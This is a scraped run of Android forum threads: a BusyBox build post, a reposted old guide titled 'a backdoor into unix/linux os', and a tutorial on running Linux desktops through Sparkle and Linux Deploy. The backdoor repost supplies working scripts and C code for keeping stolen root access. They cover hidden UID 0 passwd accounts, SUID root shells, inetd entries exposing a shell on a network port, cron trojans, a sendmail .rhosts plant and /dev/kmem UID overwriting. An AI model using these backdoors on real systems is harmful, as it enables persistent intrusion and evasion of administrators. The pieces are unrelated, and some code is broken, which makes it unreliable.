bunzip2, bzcat, bzip2, cal, cat, catv, chat, chattr, chgrp, chmod,
chown, chpasswd, chpst, chroot, chrt, chvt, cksum, clear, cmp, comm,
cp, cpio, crond, crontab, cryptpw, cttyhack, cut, date, dc, dd,
deallocvt, delgroup, deluser, depmod, devmem, df, dhcprelay, diff,
dirname, dmesg, dnsd, dnsdomainname, dos2unix, du, dumpkmap,
dumpleases, echo, ed, egrep, eject, env, envdir, envuidgid, ether-wake,
expand, expr, fakeidentd, false, fbset, fbsplash, fdflush, fdformat,
fdisk, fgconsole, fgrep, find, findfs, flock, fold, free, freeramdisk,
fsck, fsck.minix, fsync, ftpd, ftpget, ftpput, fuser, getopt, getty,
grep, gunzip, gzip, halt, hd, hdparm, head, hexdump, hostid, hostname,
httpd, hush, hwclock, id, ifconfig, ifdown, ifenslave, ifplugd, ifup,
inetd, init, insmod, install, ionice, iostat, ip, ipaddr, ipcalc,
ipcrm, ipcs, iplink, iproute, iprule, iptunnel, kbd_mode, kill,
killall, killall5, klogd, last, length, less, linux32, linux64,
linuxrc, ln, loadfont, loadkmap, logger, login, logname, logread,
losetup, lpd, lpq, lpr, ls, lsattr, lsmod, lspci, lsusb, lzcat, lzma,
lzop, lzopcat, makedevs, makemime, man, md5sum, mdev, mesg, microcom,
mkdir, mkdosfs, mke2fs, mkfifo, mkfs.ext2, mkfs.minix, mkfs.vfat,
mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount,
mountpoint, mpstat, mt, mv, nameif, nbd-client, nc, netstat, nice,
nmeter, nohup, nslookup, ntpd, od, openvt, passwd, patch, pgrep, pidof,
ping, ping6, pipe_progress, pivot_root, pkill, pmap, popmaildir,
poweroff, powertop, printenv, printf, ps, pscan, pwd, raidautorun,
rdate, rdev, readahead, readlink, readprofile, realpath, reboot,
reformime, remove-shell, renice, reset, resize, rev, rm, rmdir, rmmod,
route, rpm, rpm2cpio, rtcwake, run-parts, runlevel, runsv, runsvdir,
rx, script, scriptreplay, sed, sendmail, seq, setarch, setconsole,
setfont, setkeycodes, setlogcons, setsid, setuidgid, sh, sha1sum,
sha256sum, sha512sum, showkey, slattach, sleep, smemcap, softlimit,
sort, split, start-stop-daemon, stat, strings, stty, su, sulogin, sum,
sv, svlogd, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac,
tail, tar, tcpsvd, tee, telnet, telnetd, test, tftp, tftpd, time,
timeout, top, touch, tr, traceroute, traceroute6, true, tty, ttysize,
tunctl, udhcpc, udhcpd, udpsvd, umount, uname, uncompress, unexpand,
uniq, unix2dos, unlzma, unlzop, unxz, unzip, uptime, usleep, uudecode,
uuencode, vconfig, vi, vlock, volname, wall, watch, watchdog, wc, wget,
which, who, whoami, xargs, xz, xzcat, yes, zcat, zcip
Click to expand...
Click to collapse
ls coloring is enabled but didn't default
http://www.neroon.com/BusyBox_v1.18.5_android/busybox
PS: Compiled according to:
http://www.arm9board.net/wiki/index.php?title=Filesystem_using_Busybox
http://afewe.wordpress.com/android-arm-development/cross-compile-busybox-for-arm-android/

good work, thx!
one question:
can ntpd act as an ntp time server ?
I ran "ntpd -l" and looked at "netstat" output, found that the ntpd daemon has started at port 123, but the state showed CLOSED, not LISTEN.
Any suggestions to run an NTP time server on an android phone?

psfan said:
can ntpd act as an ntp time server ?
Click to expand...
Click to collapse
AFAIK no
http://linux.die.net/man/1/ntpd

I have been looking for a way to use terminal shell to push a file using ftpput, does this work on yours?
Whats the best way to add this to my Evo 4G CM7?
Thanks for your work on this

#a backdoor into unix/linux os;

I thought this was interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing.After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil

Happy Reading

There are some small spacing errors in code but you the idea

[Guide] Running Linux on Android with 3D Acceleration / OpenGL (Root Required)

All credits go to:
Hentacler for making Sparkle
Meefik for making Linux Deploy
Now on to the tutorial!
Requirements:
Sparkle
Linux Deploy
Termux
Now you have all those apps installed lets continue
Open Termux then enter:
Code:
su
Once in root mode enter:
Code:
setenforce 0
Then exit:
Code:
exit
Open Linux Deploy and configure it to your likings
My configuration:
Code:
Distribution: Debian
Architecture: arm64
Distribution Suite: ubstable
-
Installation type: File
-
Image size: 32GB
Then set your username and password, for this tutorial I set my username to:
Code:
android
And im not gonna tell you my password
After you've set up your configuration scroll down and configure init, mounts and ssh
INIT:
Code:
Enable: On
Init system: run-parts
Init settings:
- Init path: /etc/rc.local
- Init user: android
- Async: Disabled
MOUNTS:
Code:
Enable: On
Mount points:
- /data/data/com.sion.sparkle/files - /sparkle
SSH:
Code:
Enable: On
SSH settings:
- Port: 22
- SSH options:
Now you've set this all up go back to the main overview screen of Linux Deploy, hit the tripple dot menu and install!
After the install is done, hit START
Now open Termux and install SSH:
Code:
pkg install openssh
then connect to linux via SSH: (username is the username set in Linux Deploy)
Code:
ssh [email protected]
Now you've connected you need to install some packages:
Code:
sudo apt install weston
sudo apt install xwayland
sudo apt install nano
sudo apt install dbus-x11
Also install your desktop environment of choice, for this tutorial im going with KDE:
Code:
sudo apt install kde-full
Once everything is done installing you need to configure some scripts:
Code:
nano sparkle.sh
Now paste this: (make sure to change "startplasma-x11" to your preferred DE, if you're also using KDE then you don't need to change anything)
Code:
#!/bin/bash
set -e
sudo chmod 777 /sparkle
sudo chmod 777 /sparkle/wayland-0
XDG_RUNTIME_DIR=/sparkle Xwayland &
sleep 1
export DISPLAY=:0
startplasma-x11
Now open Sparkle and click "edit user.sh" and delete everything then hit "save", Go back to the main screen of Sparkle and hit "Start", you should see a notification appear in your status bar
Now to start everything go back to Termux and assuming you're still SSH'ed into Linux type:
Code:
sh sparkle.sh
and enjoy!
Bonus step:
If you want everything to automatically start when pressing "START" in Linux Deploy than you can configure this
Open Termux and connect to Linux via SSH and change the permissions/edit the rc.local file: (edit username to the username set in Linux Deploy)
Code:
sudo chmod +x /etc/rc.local
sudo chmod +x /home/username/sparkle.sh
sudo nano /etc/rc.local
In nano paste: (once again change username to the username in Linux Deploy
Code:
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
/home/username/sparkle.sh
exit 0
Now every time you want to use Linux just open Sparkle, hit "Start", then go to Linux Deploy and start linux and your DE will automatically load up on your screen without entering a single command!

Unfortunately, this method doesn't give hardware 3d acceleration. Just very slow software emulation. It is much harder or even not possible to achieve true acceleration on android handhelds.

Hi
What version of Sparkle did you use? I've tried this tutorial here but received an error of wayland-0 not found when I try to run my linux installation on my device
I've looked in the folder /data/data/com.sion.sparkle/files and this folder is empty
Thanks for the tutorial!

Got any images or a video you can share?

It works
I managed to use it, but with xfce KDE had a black screen, and I couldn't use the audio even though I made the alsa plugin, and it doesn't rotate the screen, but it's very good.

I have One Plus 8 pro.
So my results with this software 3D acceleration are that the performance really suck but its amazing for now because you need this basic aceleration in almost everything i can now render videos on my phone in kdenlive and the phone has kinda good cpu performace so there is no problem basicly i can now run in this chroot everything that can be runned on raspi and i am also messing around with BOX86 which is a hardware translation of arm to x86 architectures so far i can run x86 apps for linux inside the chroot and now with this little tool i can maybe get wine x86 runnig which means windows apps support on android yeeey of course with this low performace of a gpu i could at best try games before year 2000 and maybe if they start up have some good fps but i highly doubt that because raspi has problem runnig (in twister os) even unreal tournament and raspi has 5 to 6 times higher performance than this software accel.
Benchmarks i did were glxgears i got anywere from 200 to 270 fps which is not really much
Also I used 2 desktop config started the one thats build in vnc from the app and then started sparkle connected to it and had second desktop start up using lxde on my phone on phone the screen really sucks to to work with so i used scrcpy to mirror the screen of phone to pc so basicaly a have full control remotly i hope that this will have future version development to improve on code so that we could get more performace out of this.
Image below.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}

I am using LXDE with Sparkle. I would like a lower screen resolution, all things look so small. I can do that with XSDL, how in Sparkle?

@HolyChickenGuy
Thanks for the well done tutorial ! I followed it and it worked out of the box.
However, two issues I came accross to which I did not find the solution, yet:
1. Is there a way to rotate the screen ?
2. How can I bring the X-window to the second screen connected via USB->HDMI adapter ? I tried to set DISPLAY:1 but 1 was not found and :0 is the devices screen.
Cheers mate and keep up the good work.

You can Also use Termux Desktop
Termux desktop is much faster and easier to use and you can experience a complete Linux GUI with termux, and it Is also lightwight.

saad maqsood said:
Termux desktop is much faster and easier to use and you can experience a complete Linux GUI with termux, and it Is also lightwight.
Click to expand...
Click to collapse
The described way basically is using Termux the way you propose. However it adds the 3D acceleration by using sparkle which is definitely a plus.
---------- Post added at 09:49 PM ---------- Previous post was at 09:47 PM ----------
flunkyball said:
@HolyChickenGuy
Thanks for the well done tutorial ! I followed it and it worked out of the box.
However, two issues I came accross to which I did not find the solution, yet:
1. Is there a way to rotate the screen ?
2. How can I bring the X-window to the second screen connected via USB->HDMI adapter ? I tried to set DISPLAY:1 but 1 was not found and :0 is the devices screen.
Cheers mate and keep up the good work.
Click to expand...
Click to collapse
Okay, rotating the screen is done by rotating Termux BEFORE you start the windowmanager.
But - for bringing it up on the external monitor I haven't not found the trick, yet

lower resolution in Sparkle app? relative mouse is possible?

but what if i want to install LXQt on my device
#!/bin/bash
set -e
sudo chmod 777 /sparkle
sudo chmod 777 /sparkle/wayland-0
XDG_RUNTIME_DIR=/sparkle Xwayland &
sleep 1
export DISPLAY=:0
startplasma-x11
what should i change in the script??????

sorry for the probably dumb question but Xsdl seems to work work quite well in my use cases (like watching youtube videos in 360p on my Samsung Tab S5e) ...
... so I am wondering : what are the advantages of Sparkle/Wayland over Xsdl ?? ... will my youtube videos be smoother ??
... does Sparkle/Wayland has better touch support than Xsdl ?? ... for example can you scroll a web browser window by touching inside the window (not the scrollbar) with your finger ??

pierro78 said:
sorry for the probably dumb question but Xsdl seems to work work quite well in my use cases (like watching youtube videos in 360p on my Samsung Tab S5e) ...
... so I am wondering : what are the advantages of Sparkle/Wayland over Xsdl ?? ... will my youtube videos be smoother ??
... does Sparkle/Wayland has better touch support than Xsdl ?? ... for example can you scroll a web browser window by touching inside the window (not the scrollbar) with your finger ??
Click to expand...
Click to collapse
you sure can get 1080 on a tab s5e with xsdl...
sparkle app is for sure more lightweight but in some situatons xsdl is better, at least with some games, at least with my experience
did you compile and use the android-shmem library?

zanfix said:
you sure can get 1080 on a tab s5e with xsdl...
sparkle app is for sure more lightweight but in some situatons xsdl is better, at least with some games, at least with my experience
did you compile and use the android-shmem library?
Click to expand...
Click to collapse
wow 1080 ! that would be awesome ! thanks for the info !!
actually 360p is not so smooth on my S5e without android-shmem library ...
if I understand correctly I just have to compile that in my chroot and then the shared memory feature is already supported in the Xserver xsdl that I installed from the playstore ??
thanks again !!

pierro78 said:
wow 1080 ! that would be awesome ! thanks for the info !!
actually 360p is not so smooth on my S5e without android-shmem library ...
if I understand correctly I just have to compile that in my chroot and then the shared memory feature is already supported in the Xserver xsdl that I installed from the playstore ??
thanks again !!
Click to expand...
Click to collapse
android-shmem library can give you a performance boost if the application you are running can use the x server MIT-SHM extension
For video playback in a web browser, firefox-esr for example, the android-shm library will not give you any performance gain...
Since there is no hardware acceleration in xsdl, In order to put the minimum possible load on the cpu you should match the screen resolution of the xserver with the target max resolution of the videos you are planning to playback.
My tab s6 has 2560x1600 native resolution, i run the xserver at 1920x1200 so I keep the aspect ratio of the screen but match the clip (tube video) native resolution (so that no rescaling will happen)
I can get acceptable youtube video playback also on my old pixelc c, that has a quadcore a57

well I don't know what I did wrong previously ... my youtube videos seem to play nice on 1080 in Xserver xsdl with arm64 vivaldi in my chroot (Tab S5e) with or without
env LD_PRELOAD="/home/pierro78/android-shmem/libandroid-shmem-aarch64.so" icewm&
now !
and I don't see any difference with or without LD_PRELOAD="/home/pierro78/android-shmem/libandroid-shmem-aarch64.so" in vivaldi although it may support x server MIT-SHM extension as you said ??
also I have errors when using /home/pierro78/android-shmem/libandroid-shmem-aarch64.so when I start icewm (same errors if regular user or root) :
[email protected]:/home/pierro78# icewm&
[1] 8527
[email protected]:/home/pierro78# Failed to connect to session manager: Failed to connect to the session manager: SESSION_MANAGER environment variable not defined
shmget: key 0 size 4096 flags 01600 (flags are ignored)
shmget: bound UNIX socket /dev/shm/00002157
listening_thread: thread started
shmget: ID 0 shmid 21570001 FD 7 size 4096
shmat: shmid 21570001 shmaddr (nil) shmflg 0
shmat: mapped addr 0x735094b000 for FD 7 ID 0
shm_remove: deleting shmid 21570001
shm_remove: shmid 21570001 is still mapped to addr 0x735094b000, it will be deleted on shmdt() call
shmdt: unmapped addr 0x735094b000 for FD 7 ID 0 shmid 21570001
shmdt: deleting shmid 21570001
and when I start vivaldi as regular user :
shmctl: cmd 3 not implemented yet!
shmget: key 0 size 2946039 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
[7437:7437:0426/232122.758794:ERROR:CONSOLE(0)] "Unchecked runtime.lastError: The message port closed before a response was received.", source: chrome-extension://mpognobbkildjkofajifpdfhcoklimli/browser.html (0)
shmget: key 0 size 112140 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
shmget: key 0 size 368460 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
or if I start vivaldi as root user :
shmctl: cmd 3 not implemented yet!
shmget: key 0 size 2831220 flags 01606 (flags are ignored)
shmget: bound UNIX socket /dev/shm/00001f6e
shmget: ID 0 shmid 1f6e0001 FD 36 size 2834432
shmat: shmid 1f6e0001 shmaddr (nil) shmflg 0
shmat: mapped addr 0x71b6582000 for FD 36 ID 0
shm_remove: deleting shmid 1f6e0001
shm_remove: shmid 1f6e0001 is still mapped to addr 0x71b6582000, it will be deleted on shmdt() call
shmdt: unmapped addr 0x71b6582000 for FD 36 ID 0 shmid 1f6e0001
shmdt: deleting shmid 1f6e0001
listening_thread: thread started
[7990:7990:0426/232440.532571:ERROR:CONSOLE(0)] "Unchecked runtime.lastError: The message port closed before a response was received.", source: chrome-extension://mpognobbkildjkofajifpdfhcoklimli/browser.html (0)
I am not sure how to check if my libandroid-shmem-aarch64.so is working ??
I would expect some "files" in /dev/shm but there is nothing there ...

pierro78 said:
[email protected]:/home/pierro78# icewm&
[1] 8527
[email protected]:/home/pierro78# Failed to connect to session manager: Failed to connect to the session manager: SESSION_MANAGER environment variable not defined
shmget: key 0 size 4096 flags 01600 (flags are ignored)
shmget: bound UNIX socket /dev/shm/00002157
listening_thread: thread started
shmget: ID 0 shmid 21570001 FD 7 size 4096
shmat: shmid 21570001 shmaddr (nil) shmflg 0
shmat: mapped addr 0x735094b000 for FD 7 ID 0
shm_remove: deleting shmid 21570001
shm_remove: shmid 21570001 is still mapped to addr 0x735094b000, it will be deleted on shmdt() call
shmdt: unmapped addr 0x735094b000 for FD 7 ID 0 shmid 21570001
shmdt: deleting shmid 21570001
Click to expand...
Click to collapse
PS : my bad : these error messages are coming from my xfce4-terminal, not icewm ...

pierro78 said:
well I don't know what I did wrong previously ... my youtube videos seem to play nice on 1080 in Xserver xsdl with arm64 vivaldi in my chroot (Tab S5e) with or without
env LD_PRELOAD="/home/pierro78/android-shmem/libandroid-shmem-aarch64.so" icewm&
now !
and I don't see any difference with or without LD_PRELOAD="/home/pierro78/android-shmem/libandroid-shmem-aarch64.so" in vivaldi although it may support x server MIT-SHM extension as you said ??
also I have errors when using /home/pierro78/android-shmem/libandroid-shmem-aarch64.so when I start icewm (same errors if regular user or root) :
[email protected]:/home/pierro78# icewm&
[1] 8527
[email protected]:/home/pierro78# Failed to connect to session manager: Failed to connect to the session manager: SESSION_MANAGER environment variable not defined
shmget: key 0 size 4096 flags 01600 (flags are ignored)
shmget: bound UNIX socket /dev/shm/00002157
listening_thread: thread started
shmget: ID 0 shmid 21570001 FD 7 size 4096
shmat: shmid 21570001 shmaddr (nil) shmflg 0
shmat: mapped addr 0x735094b000 for FD 7 ID 0
shm_remove: deleting shmid 21570001
shm_remove: shmid 21570001 is still mapped to addr 0x735094b000, it will be deleted on shmdt() call
shmdt: unmapped addr 0x735094b000 for FD 7 ID 0 shmid 21570001
shmdt: deleting shmid 21570001
and when I start vivaldi as regular user :
shmctl: cmd 3 not implemented yet!
shmget: key 0 size 2946039 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
[7437:7437:0426/232122.758794:ERROR:CONSOLE(0)] "Unchecked runtime.lastError: The message port closed before a response was received.", source: chrome-extension://mpognobbkildjkofajifpdfhcoklimli/browser.html (0)
shmget: key 0 size 112140 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
shmget: key 0 size 368460 flags 01606 (flags are ignored)
shmget: cannot bind UNIX socket, bailing out
or if I start vivaldi as root user :
shmctl: cmd 3 not implemented yet!
shmget: key 0 size 2831220 flags 01606 (flags are ignored)
shmget: bound UNIX socket /dev/shm/00001f6e
